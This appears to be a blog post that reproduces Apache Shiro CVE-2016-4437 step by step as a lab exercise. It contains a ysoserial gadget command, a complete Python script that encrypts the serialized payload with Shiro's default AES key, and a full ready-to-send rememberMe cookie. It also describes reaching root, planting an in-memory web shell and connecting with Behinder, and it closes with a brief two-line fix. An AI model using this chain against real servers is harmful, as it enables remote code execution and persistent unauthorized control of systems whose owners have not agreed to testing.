Shiro-CVE-2016-4437

Shiro-CVE-2016-4437

1.目标加入随意字符提交后 bp中带有:Set-Cookie: rememberMe=deleteMe字段image-20250306101153831

2.ysoserial 生成

1
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /desktop" > poc.ser

生成payload的py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import sys
import uuid
import base64
from Crypto.Cipher import AES
 
def encode_rememberme():
    f = open('poc.ser','rb')
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(f.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
 
if __name__ == '__main__':
    payload = encode_rememberme()   
    print("rememberMe={0}".format(payload.decode()))

payload:

1
rememberMe=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

3.在Cookie处填入payload!image-20250306112846388

4.shiro利用工具 权限为root

image-20250306115621653

执行内存马

image-20250306120252462

冰蝎连接上

image-20250306120324856

5.漏洞修复

1
2
1.Shiro版本>1.2.4
2.修改密钥
漏洞复现
#shiro #默认密钥爆破
Shiro-CVE-2016-4437
https://ydnd.github.io/2025/03/25/Shiro-密钥泄露CVE-2016-4437/
Author
IE
Posted on
March 25, 2025
Licensed under